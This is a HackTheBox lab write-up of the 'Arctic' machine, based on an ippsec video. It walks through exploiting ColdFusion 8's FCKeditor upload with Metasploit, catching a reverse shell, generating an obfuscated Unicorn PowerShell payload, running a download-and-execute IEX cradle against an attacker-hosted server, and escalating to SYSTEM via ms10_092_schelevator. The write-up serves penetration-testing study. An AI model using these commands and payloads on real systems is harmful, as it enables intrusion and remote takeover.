Disassembly of ippsec’s youtube video HackTheBox - Arctic. Focus on Windows and basic enumeration, intercepting an application communications via burp. Shell creation with Unicorn and powershell usage along with windows enumeration.

Legal Usage: The information provided by execute@will is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.

This series of write-up will contain comprehensive write-ups of hackthebox machines. In an effort to sharpen reporting techniques and help solidify the understand and methodologies used during penetration testing.

Enumeration

nmap scan:

1	`nmap -sV -sC -oA nmap 10.10.10.11`

(results)

Port 135 = Windows RPC Port 8500 = doesn’t know what it is Port 49154 = Windows RPC

investigate 8500

page takes a significant amount of time to load possibly why the name Arctic.

exploring paths /CFIDE

an “administrator” page is found. administrator/

if page loads correct should say Cold Fusion 8

searchploit

1	`searchsploit coldfusion`

we have results pointing to the version 8.x.x but are cross site scripting. But there is

which is a metasploit file upload, a possible way to get a foothold into the box.

metasploit

msfconsole
search coldfusion

exploit/windows/http/coldfusion_fckeditor looks like the same exploit from the searchsploit.

use exploit/windows/http/coldfusion_fckeditor
show options
set RHOST 10.10.10.11
set RPORT 8500
run

almost immediately fails due to the response time that needs to be adjusted in metasploit.

Modify advanced options

advanced options
set VERBOSE true # to see the output
run

hoping to see a POST request and a server response.

If the module doesn’t support a proxy script we can push the module/communications to burp:

setup burp to intercept application

proxy tab > options > add proxy listeners

bind to 8500

Request Handling:

tick box for running:

go to web browser localhost:8500

every time we connect to 8500 we get redirected to 10.10.10.11:8500

Turn intercept on:

In metasploit:

1	`set RHOST 127.0.0.1`

and at this point we are now redirecting through burp (forward first request) then:

see the request metasploit is trying to make. Next send to repeater and send:

how this exploit works is that the Post request is sent to CurrentFolder and a .jsp file is added but with a %00 null byte at the end which confuses the web-server and allows for the file to upload.

Finished 200 response:

Futhermore, the script is going to try to open a connection to our local box on port 4444 thus we need to have a listener setup to catch the connection.

setup listener

1	`ncat -lvnp 4444`

navigate to the k.jsp page

1	`10.10.10.11:8500/userfiles/file/K.jsp`

wait the 20-30s for the connection to establish.

Reverse Shell - RCE

a connection is established via the K.jsp file to port 4444:

this is just a reverse shell and we need to upgrade it.

unicorn to upgrade shell

Github Link: https://github.com/trustedsec/unicorn

1	`/opt/unicorn/unicorn.py`

usage:

1	`/opt/unicorn/unicorn.py windows/meterpreter/reverse_tcp 10.10.12.194 31337`

output’s two files when it’s done.

First file: unicorn.rc - all commands to load unicorn in metasploit Second file: powershell_attack.txt = unicorn powershell exploit

1	`cat powershell_attack.txt`

command is very long but can return a shell. Sending this all through one terminal might not be the best call the better option would be to have the file sent to target.

load metasploit w/ unicorn command

1	`msfconsole -r unicorn.rc`

create powershell_attack to html

create a new file with a pasted clipboad of the exploit and named it exploit.html

delete the double quote in the beginning and the end of the powershell script to have a pure version of it. Now we have a script that has been obfuscated to evade antivirus.

setup local SimpleHTTPServer

1	`python -m SimpleHTTPServer`

On target shell:

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.194:8000/exploit.html')"

box hits the web-server:

Meterpreter Shell:

firstly, check the sysinfo to see architecture and the meterpreter session is in a 32bit session.

enumerate windows

getuid

search suggest - checks KBs on box and recommended exploits

1	`search suggest`

use post/multi/recon/local_exploit_suggester
show options
set SESSION 1
run

first ran in a 32bit bit process and then migrate to a x64 as different exploits become available. Run PowerUp.ps1 if nothing returns. (results)

save results as a copy locally.

migrate to 64bit

Meterpreter:

1	`ps # list processes`

Looking for a process with an x64 and a 1 as that means its interactive and there is more leverage on the things it has the ability to do. None in this case.

migrate to conhost:

1	`migrate 1120`

Run “sysinfo” to verify were on a x64 process:

sysinfo

confirmed x64, background with ctrl+z show options # check for suggester run

returns only one that appears to be vulnerable. Save to notes

Compare notes:

ms10_092_schelevator reported on both architectures. Which should be a stong first to try.

Root&Loot

 use exploit/windows/local/ms10_092_schelevator
show options
set session 1
run

in this scenairo it actually used a local 172. IP which was not intendted as so the set LHOST 10.10.12.194 was sent again and ran.

session 2 was successfully opened

getuid

Achieved NT AUTHORITY\SYSTEM

loot

shell

If you don’t know who ippsec is check him out at:

Youtube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA Twitter: https://twitter.com/ippsec